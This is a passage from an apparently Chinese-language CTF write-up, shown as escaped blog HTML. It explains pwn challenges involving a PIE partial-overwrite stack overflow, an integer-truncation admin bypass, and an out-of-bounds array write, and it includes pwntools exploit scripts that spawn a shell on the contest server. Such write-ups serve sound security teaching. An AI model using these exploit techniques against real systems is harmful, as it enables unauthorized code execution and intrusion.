u77e5\u9053\u8fd9\u4e48\u591a\uff0c\u6211\u4eec\u8ddf\u8fdbfunc1\u770b\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"763\" height=\"300\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-675\"  sizes=\"auto, (max-width: 763px) 100vw, 763px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f88\u6807\u51c6\u7684\u6808\u6ea2\u51fa\u6f0f\u6d1e\u70b9<\/p>\n\n\n\n<p>\u53e6\u5916\uff0c\u6211\u4eec\u4e5f\u5f88\u5bb9\u6613\u5728\u51fd\u6570\u680f\u90a3\u91cc\u770b\u5230\u5b58\u5728backdoor\u51fd\u6570<\/p>\n\n\n\n<p>\u8ddf\u8fdbbackdoor\u53ef\u4ee5\u770b\u5230<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"416\" height=\"199\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-674\"  sizes=\"auto, (max-width: 416px) 100vw, 416px\" \/><\/div><\/figure>\n\n\n\n<p>\u90a3\u601d\u8def\u8fd8\u662f\u5f88\u660e\u786e\u4e86\uff0c\u5c31\u662f\u6808\u6ea2\u51fa\u8986\u76d6\u8fd4\u56de\u5730\u5740\u5230backdoor\u51fd\u6570<\/p>\n\n\n\n<p>\u4f46\u662fpie\u673a\u5236\u4e0d\u662f\u8bf4\u597d\u662f\u968f\u673a\u5316\u5730\u5740\u7684\u5417\uff0c\u90a3\u6211\u4eec\u600e\u4e48\u786e\u5b9abackdoor\u5728\u8fd0\u884c\u65f6\u7684\u5730\u5740\uff1f<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\uff0c\u5982\u679c\u4f60\u5207\u6362\u5230text view\u89c6\u56fe<\/p>\n\n\n\n<p>\u53bb\u89c2\u5bdfmain\u51fd\u6570\u548cbackdoor\u51fd\u6570\uff0c\u5c31\u4f1a\u53d1\u73b0\u4e24\u4e2a\u51fd\u6570\u662f\u5728\u540c\u4e00\u5185\u5b58\u9875\u4e0a\u7684<\/p>\n\n\n\n<p>\u90a3\u4e48\uff0c\u5982\u679c\u7a0b\u5e8f\u8fdb\u5165main\u51fd\u6570\u4e86\uff0c\u5bf9\u5e94\u7684\u6808\u6307\u9488\u5c31\u5728main\u4e0a\uff0c\u90a3\u4e48\u4f60\u53ea\u8981\u8986\u76d6\u8fd4\u56de\u5730\u5740\u7684\u540e\u4e24\u4f4d\uff08\u56e0\u4e3a\u8fd9\u91cc\u90fd\u662f0x12xx\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-19-1024x659.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"659\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-19-1024x659.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-673\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6240\u4ee5\u601d\u8def\u8fd8\u662f\u86ee\u660e\u786e\u7684\uff0c0x28\u5148\u586b\u5145\u6ee1buf\uff08\u4f60\u90fd\u770bpie\u8fd9\u9898\u4e86\uff0c\u5e94\u8be5\u77e5\u9053\u4e3a\u4ec0\u4e48\u662f0x28\u5427\u2026\u2026\u4e0d\u7406\u89e3\u8fd8\u662f\u60f3\u7406\u89e3\u7684\uff0c\u8054\u7cfb\u51fa\u9898\u4eba\uff09<\/p>\n\n\n\n<p>\u7136\u540ep8\u8986\u76d6\u5730\u5740\u7684\u540e\u4e24\u4f4d\uff0c\u8fd9\u6837\u7531\u4e8e\u5f53\u524d\u7684\u6808\u6307\u9488\u524d\u9762\u7684\u51e0\u4f4d\u5168\u662f\u548cbackdoor\u4e00\u81f4\u7684\uff0c\u53ea\u6539\u540e\u4e24\u4f4d\u5c31\u80fd\u505a\u5230\u8df3\u8f6cbackdoor\u51fd\u6570<\/p>\n\n\n\n<p>\u597d\u4e86\uff0c\u8fd9\u91cc\u53c8\u8981\u5f15\u51fa\u53e6\u5916\u4e00\u4e2a\u95ee\u9898\uff1a<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4e3a\u4ec0\u4e48\u4e0d\u76f4\u63a5\u8df3\u8f6c\u5230<code>0x124C<\/code>\uff1f<\/h4>\n\n\n\n<p>\u5f53\u6211\u4eec\u901a\u8fc7\u6f0f\u6d1e\u8986\u76d6\u8fd4\u56de\u5730\u5740\u65f6\uff0c\u7a0b\u5e8f\u7684<strong>\u6808\u72b6\u6001\u662f\u56fa\u5b9a\u7684<\/strong>\uff08\u7531\u6f0f\u6d1e\u89e6\u53d1\u65f6\u7684\u4e0a\u4e0b\u6587\u51b3\u5b9a\uff09\u3002\u5982\u679c\u76f4\u63a5\u8df3\u8f6c\u5230<code>0x124C<\/code>\uff08\u51fd\u6570\u8d77\u59cb\u5730\u5740\uff09\uff0c\u4f1a\u6267\u884c<code>push rbp<\/code>\u6307\u4ee4 \u2014\u2014 \u8fd9\u6761\u6307\u4ee4\u4f1a\u5c06\u5f53\u524d<code>rbp<\/code>\u7684\u503c\u538b\u5165\u6808\u4e2d\uff0c<strong>\u4fee\u6539\u6808\u7684\u5e03\u5c40<\/strong>\u3002<\/p>\n\n\n\n<p>\u5982\u679c\u6b64\u65f6\u6808\u7684\u72b6\u6001\u4e0e<code>backdoor<\/code>\u51fd\u6570\u9884\u671f\u7684\u6808\u5e27\u4e0d\u5339\u914d\uff08\u6bd4\u5982\u6808\u9876\u4f4d\u7f6e\u4e0d\u5bf9\uff09\uff0c<code>push rbp<\/code>\u53ef\u80fd\u4f1a\u8986\u76d6\u5173\u952e\u6570\u636e\uff0c\u6216\u5bfc\u81f4\u540e\u7eed<code>mov rbp, rsp<\/code>\u8bbe\u7f6e\u7684\u6808\u57fa\u5740\u9519\u8bef\uff0c\u6700\u7ec8\u5bfc\u81f4<code>call _system<\/code>\u65f6\u53c2\u6570\u4f20\u9012\u5931\u8d25\uff08\u65e0\u6cd5\u6b63\u786e\u627e\u5230<code>\"\/bin\/sh\"<\/code>\u7684\u5730\u5740\uff09\uff0c\u751a\u81f3\u7a0b\u5e8f\u5d29\u6e83\u3002<\/p>\n\n\n\n<p>\u6240\u4ee5\u8fd9\u4e2a\u65f6\u5019\uff0c\u6211\u4eec\u73a9\u70b9\u8d56\u76ae\u7684\uff0c\u6211\u4eec\u76f4\u63a5\u8df3\u5230<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.text:0000000000001250                 lea     rax, command    ; \"\/bin\/sh\"<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u76f4\u63a5\u8c03\u7528system(&#8220;\/bin\/sh&#8221;)\u4e86<\/p>\n\n\n\n<p>\ud83c\udd97\uff0c\u8981\u7d20\u96c6\u9f50\u4e86\uff0cexp\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>#context.log_level='debug'<br><br>#p = process('.\/attachment')<br>p = remote(\"ctf.ctbu.edu.cn\",33814)<br>payload = b'a'*0x28 + p8(0x50)<br>p.send(payload)<br>p.interactive()<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">coctf{Your_love_has_never_changed_like_pie_[GUID]}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Trunc<\/strong><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u6574\u4f53\u529f\u80fd<\/h4>\n\n\n\n<p>\u7ed3\u5408\u6808\u5e03\u5c40\uff0c<code>main<\/code> \u51fd\u6570\u6267\u884c\u6d41\u7a0b\uff08\u53cd\u7f16\u8bd1\u9010\u53e5\u5bf9\u5e94\uff09\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"759\" height=\"490\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-672\"  sizes=\"auto, (max-width: 759px) 100vw, 759px\" \/><\/div><\/figure>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u521d\u59cb\u5316\u4e0e\u6b22\u8fce\u754c\u9762<\/strong>\uff1a\u8c03\u7528 <code>print_welcome(argc, argv, envp)<\/code>\uff08\u5b9e\u9645\u65e0\u53c2\u6570\u4f9d\u8d56\uff0c\u4ec5\u6253\u5370\u6b22\u8fce\u4fe1\u606f\uff09\uff1b<\/li>\n\n\n\n<li>\u8bfb\u53d6\u59d3\u540d\uff1a\n<ul class=\"wp-block-list\">\n<li>\u8c03\u7528 <code>printf(&amp;format)<\/code> \u6253\u5370 &#8220;\u8bf7\u8f93\u5165\u4f60\u7684\u540d\u5b57:&#8221;\uff1b<\/li>\n\n\n\n<li>\u8c03\u7528 <code>fgets(s, 32, _bss_start)<\/code> \u8bfb\u53d6\u59d3\u540d\uff08<code>_bss_start<\/code> \u5bf9\u5e94\u6807\u51c6\u8f93\u5165 <code>stdin<\/code>\uff0c<code>fgets<\/code> \u9650\u5236\u6700\u591a\u8bfb 32 \u5b57\u8282\uff0c\u65e0\u6808\u6ea2\u51fa\u98ce\u9669\uff09\uff1b<\/li>\n\n\n\n<li>\u8c03\u7528 <code>strcspn(s, \"\\n\")<\/code> \u627e\u5230\u6362\u884c\u7b26\u5e76\u7f6e 0\uff0c\u79fb\u9664\u8f93\u5165\u4e2d\u7684\u6362\u884c\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>\u8bfb\u53d6\u9b54\u6cd5\u7f16\u53f7\uff1a\n<ul class=\"wp-block-list\">\n<li>\u8c03\u7528 <code>printf(&amp;byte_4020E6)<\/code> \u6253\u5370 &#8220;\u8bf7\u8f93\u5165\u4f60\u7684\u9b54\u6cd5\u7f16\u53f7:&#8221;\uff1b<\/li>\n\n\n\n<li>\u8c03\u7528 <code>__isoc99_scanf(\"%llu\", &amp;v4)<\/code> \u8bfb\u53d6 64 \u4f4d\u65e0\u7b26\u53f7\u6574\u6570\u5230 <code>v4<\/code>\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u9b54\u6cd5\u7f16\u53f7\u622a\u65ad<\/strong>\uff1a\u6267\u884c <code>v6 = v4<\/code>\uff08<code>__int64<\/code> \u8f6c <code>int<\/code>\uff0c64 \u4f4d\u6570\u503c\u622a\u65ad\u4e3a 32 \u4f4d\uff0c\u9ad8 32 \u4f4d\u88ab\u4e22\u5f03\uff09\uff1b<\/li>\n\n\n\n<li>\u4fe1\u606f\u6253\u5370\u4e0e\u6743\u9650\u6821\u9a8c\uff1a\n<ul class=\"wp-block-list\">\n<li>\u8c03\u7528 <code>printf(asc_402110, s, (unsigned int)v4)<\/code>\uff1a\u683c\u5f0f\u5316\u8f93\u51fa\u59d3\u540d\u4e0e\u9b54\u6cd5\u7f16\u53f7\uff0c\u5176\u4e2d <code>(unsigned int)v4<\/code> \u663e\u5f0f\u5c06 64 \u4f4d <code>v4<\/code> \u8f6c\u4e3a 32 \u4f4d\u65e0\u7b26\u53f7\u6574\u6570\uff0c\u8fdb\u4e00\u6b65\u9a8c\u8bc1\u622a\u65ad\u903b\u8f91\uff1b<\/li>\n\n\n\n<li>\u8c03\u7528 <code>is_admin(v4)<\/code> \u5e76\u5224\u65ad\u8fd4\u56de\u503c\uff1a\u82e5\u4e3a\u771f\u5219\u8c03\u7528 <code>get_flag()<\/code>\uff0c\u5426\u5219\u6253\u5370 <code>byte_402140<\/code>\uff08\u6743\u9650\u4e0d\u8db3\uff09\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u7a0b\u5e8f\u9000\u51fa<\/strong>\uff1a\u8fd4\u56de 0\u3002<\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\"><code>is_admin<\/code> \u51fd\u6570\u53cd\u7f16\u8bd1\u5206\u6790\uff08\u6743\u9650\u6821\u9a8c\u6838\u5fc3\uff09<\/h4>\n\n\n\n<p>\u53cd\u7f16\u8bd1\u4ee3\u7801\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">_BOOL8 __fastcall is_admin(int a1)<br>{<br>  return a1 == 322420958;  \/\/ \u5173\u952e\uff1a32\u4f4d\u6574\u6570\u5bf9\u6bd4\uff0c322420958 = 0x1337c0de\uff08\u5341\u516d\u8fdb\u5236\uff09<br>}<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u53c2\u6570\u7c7b\u578b<\/strong>\uff1a<code>a1<\/code> \u4e3a <code>int<\/code>\uff0832 \u4f4d\uff09\uff0c\u4f46\u8c03\u7528\u65f6\u4f20\u5165\u7684\u662f <code>v4<\/code>\uff08<code>__int64<\/code>\uff0c64 \u4f4d\uff09\u2014\u2014 \u6b64\u5904\u5b58\u5728<strong>\u9690\u5f0f\u622a\u65ad<\/strong>\uff1a64 \u4f4d <code>v4<\/code> \u4f20\u5165 32 \u4f4d\u53c2\u6570 <code>a1<\/code> \u65f6\uff0c\u7f16\u8bd1\u5668\u81ea\u52a8\u4e22\u5f03\u9ad8 32 \u4f4d\uff0c\u4ec5\u4fdd\u7559\u4f4e 32 \u4f4d\uff1b<\/li>\n\n\n\n<li><strong>\u6821\u9a8c\u903b\u8f91<\/strong>\uff1a\u4ec5\u5f53\u622a\u65ad\u540e\u7684 32 \u4f4d\u6570\u503c\u7b49\u4e8e <code>322420958<\/code>\uff08\u5341\u8fdb\u5236\uff09\u65f6\uff0c\u8fd4\u56de\u771f\uff08<code>_BOOL8<\/code> \u5373 64 \u4f4d\u5e03\u5c14\u503c\uff0c\u771f\u4e3a\u975e 0\uff0c\u5047\u4e3a 0\uff09\uff1b<\/li>\n\n\n\n<li><strong>\u5173\u952e\u7ed3\u8bba<\/strong>\uff1a\u7ba1\u7406\u5458\u9b54\u6cd5\u7f16\u53f7\u7684 32 \u4f4d\u503c\u4e3a <code>322420958<\/code>\uff08\u5341\u516d\u8fdb\u5236 <code>0x1337c0de<\/code>\uff09\uff0c\u8fd9\u662f\u6743\u9650\u7ed5\u8fc7\u7684\u6838\u5fc3\u76ee\u6807\u503c\u3002<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">\u6f0f\u6d1e\u7c7b\u578b\uff1a64 \u4f4d\u219232 \u4f4d\u6574\u6570\u622a\u65ad\u6f0f\u6d1e<\/h4>\n\n\n\n<p>\u4ece\u53cd\u7f16\u8bd1\u4ee3\u7801\u4e2d\u53ef\u5b9a\u4f4d<strong>\u4e24\u5904\u5b8c\u5168\u72ec\u7acb\u7684\u622a\u65ad\u903b\u8f91<\/strong>\uff0c\u5747\u5bfc\u81f4 \u201c\u8f93\u5165\u7684 64 \u4f4d\u9b54\u6cd5\u7f16\u53f7\u88ab\u5f3a\u5236\u8f6c\u4e3a 32 \u4f4d\u201d\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u663e\u5f0f\u622a\u65ad<\/strong>\uff1a<code>main<\/code> \u51fd\u6570\u4e2d <code>v6 = v4<\/code>\uff08<code>__int64<\/code> \u8f6c <code>int<\/code>\uff09\uff0c\u9ad8 32 \u4f4d\u76f4\u63a5\u4e22\u5f03\uff1b<\/li>\n\n\n\n<li><strong>\u9690\u5f0f\u622a\u65ad<\/strong>\uff1a<code>is_admin(v4)<\/code> \u8c03\u7528\u65f6\uff0c64 \u4f4d <code>v4<\/code> \u4f20\u5165 32 \u4f4d\u53c2\u6570 <code>a1<\/code>\uff0c\u7f16\u8bd1\u5668\u81ea\u52a8\u622a\u65ad\u9ad8 32 \u4f4d\u3002<\/li>\n<\/ol>\n\n\n\n<p>\u4e24\u5904\u622a\u65ad\u7684\u5171\u540c\u7ed3\u679c\uff1a\u7a0b\u5e8f\u5b9e\u9645\u6821\u9a8c\u7684\u662f \u201c\u8f93\u5165 64 \u4f4d\u6570\u503c\u7684\u4f4e 32 \u4f4d\u201d\uff0c\u800c\u975e\u5b8c\u6574\u7684 64 \u4f4d\u6570\u503c \u2014\u2014 \u8fd9\u662f\u6f0f\u6d1e\u5229\u7528\u7684\u6838\u5fc3\u524d\u63d0\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u6f0f\u6d1e\u5229\u7528\u6761\u4ef6\uff08\u53cd\u7f16\u8bd1\u89c6\u89d2\uff09<\/h4>\n\n\n\n<p>\u53ea\u8981\u6ee1\u8db3\u4ee5\u4e0b\u6761\u4ef6\uff0c\u5373\u53ef\u7ed5\u8fc7 <code>is_admin<\/code> \u6821\u9a8c\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8f93\u5165\u7684 64 \u4f4d\u9b54\u6cd5\u7f16\u53f7\uff08\u5b58\u50a8\u5728 <code>v4<\/code> \u4e2d\uff09\u7684<strong>\u4f4e 32 \u4f4d\u503c = 322420958<\/strong>\uff08\u5341\u8fdb\u5236\uff09\uff1b<\/li>\n\n\n\n<li>\u9ad8 32 \u4f4d\u503c\u53ef\u4efb\u610f\uff08\u56e0\u4e3a\u622a\u65ad\u65f6\u4f1a\u88ab\u4e22\u5f03\uff0c\u4e0d\u5f71\u54cd\u6821\u9a8c\u7ed3\u679c\uff09\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u4f8b\u5982\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>64 \u4f4d\u6570\u503c <code>322420958<\/code>\uff08\u5341\u516d\u8fdb\u5236 <code>0x000000001337c0de<\/code>\uff09\uff1a\u4f4e 32 \u4f4d\u4e3a\u76ee\u6807\u503c\uff0c\u9ad8 32 \u4f4d\u4e3a 0\uff1b<\/li>\n\n\n\n<li>64 \u4f4d\u6570\u503c <code>0xdeadbeef1337c0de<\/code>\uff08\u5341\u8fdb\u5236 <code>13134307283877666014<\/code>\uff09\uff1a\u4f4e 32 \u4f4d\u4e3a <code>0x1337c0de<\/code>\uff08\u5373 322420958\uff09\uff0c\u9ad8 32 \u4f4d\u4e3a <code>0xdeadbeef<\/code>\uff0c\u5747\u6ee1\u8db3\u6761\u4ef6\u3002<\/li>\n<\/ul>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br><br># \u76ee\u6807\u4e8c\u8fdb\u5236\u6587\u4ef6<br>binary = '.\/magic_verify'<br><br># \u521b\u5efa\u8fdb\u7a0b\uff0c\u8bbe\u7f6e\u7f16\u7801\u4e3aASCII\u907f\u514d\u5b57\u8282\u8b66\u544a<br># p = process(binary)<br># \u8fdc\u7a0b\u8fde\u63a5\u65f6\u4f7f\u7528\u4e0b\u9762\u8fd9\u884c<br>p = remote('ctf.ctbu.edu.cn',33983)<br><br># \u7ba1\u7406\u5458\u9b54\u6cd5\u7f16\u53f7\u768432\u4f4d\u503c<br># ADMIN_MAGIC = 0x1337c0de<br># \u6784\u902064\u4f4d\u6570\u503c\uff0c\u4f4e32\u4f4d\u4e3aADMIN_MAGIC<br># payload = ADMIN_MAGIC | (0xdeadbeef &lt;&lt; 32)<br><br><br>#\u7b80\u7248payload<br>payload = 322420958<br><br>p.sendline(b'Hacker')<br><br><br>p.sendline(str(payload).encode())<br>    <br>    <br>p.interactive()<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u65f6\u95f4\u8df3\u8dc3\u673a\u5668<\/h3>\n\n\n\n<p>\u8fd9\u9898\u7684main\u51fd\u6570\u4ee3\u7801\u597d\u957f\uff0c\u6211\u4eec\u76f4\u63a5\u770b\u5173\u952e\u8282\u70b9\u5427<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-17.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"945\" height=\"310\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-17.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-671\"  sizes=\"auto, (max-width: 945px) 100vw, 945px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\uff0c\u5224\u65adsecret_flag == 0x7FFFFFFF\u5c31\u80fd\u62ff\u5230shell<\/p>\n\n\n\n<p>\u597d\uff0c\u90a3\u6211\u4eec\u76f4\u63a5\u627esecret_flag\u662f\u600e\u4e48\u4e2a\u4e8b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-16-1024x151.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"151\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-16-1024x151.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-670\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e00\u770b\uff0c\u4f4d\u4e8ebss\u6bb5\uff0c\u518d\u5f80\u4e0a\u7ffb\u7ffb\u5462\uff1f<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-15-1024x276.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"276\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-15-1024x276.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-669\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>world_line_params\u662f\u4e0d\u662f\u548csecret_flag\u76f8\u9694\u5f97\u5f88\u8fd1\uff1f<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u8981\u5f15\u51fa\u4e00\u4e2a\u6f0f\u6d1e\u70b9\u4e86<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><code>\u6570\u7ec4\u8d8a\u754c<\/code><\/h4>\n\n\n\n<p>\u5177\u4f53\u6f0f\u6d1e\u539f\u7406\u5efa\u8bae\u81ea\u884c\u641c\u7d22\u4e86\u89e3\uff0c\u6ca1\u770b\u61c2\u7684\u8054\u7cfb\u51fa\u9898\u4eba<\/p>\n\n\n\n<p>\u8fd9\u91cc\u76f4\u63a5\u8bb2\u89e3\u8fd9\u9898\u7684\u5e94\u7528<\/p>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u8ddf\u7740main\u51fd\u6570\u7684\u89c6\u89d2<\/p>\n\n\n\n<p>\u770b\u5230\u5b58\u5728\u4e00\u4e2amodify_param\u51fd\u6570<\/p>\n\n\n\n<p>\u8ddf\u8fdb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>int __fastcall modify_param(unsigned int a1, unsigned int a2)<br>{<br>  world_line_params&#91;a1] = a2;<br>  return printf(&amp;byte_402043, a1, a2);<br>}<\/code><\/pre>\n\n\n\n<p>\u5173\u952e\u4fe1\u606f\u63d0\u53d6\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u53c2\u6570\u7c7b\u578b\uff1aa1\uff08\u7d22\u5f15\uff09\u548ca2\uff08\u65b0\u503c\uff09\u5747\u4e3aunsigned int\uff08\u65e0\u7b26\u53f7\u6574\u6570\uff09\uff0c\u800c\u975e\u4e4b\u524d\u9ed8\u8ba4\u7684signed int \u2192 \u5f71\u54cd\uff1a\u8f93\u5165\u7684 \u201c\u7d22\u5f15\u201d \u4f1a\u88ab\u5f53\u4f5c\u65e0\u7b26\u53f7\u6570\u5904\u7406 \u2014\u2014 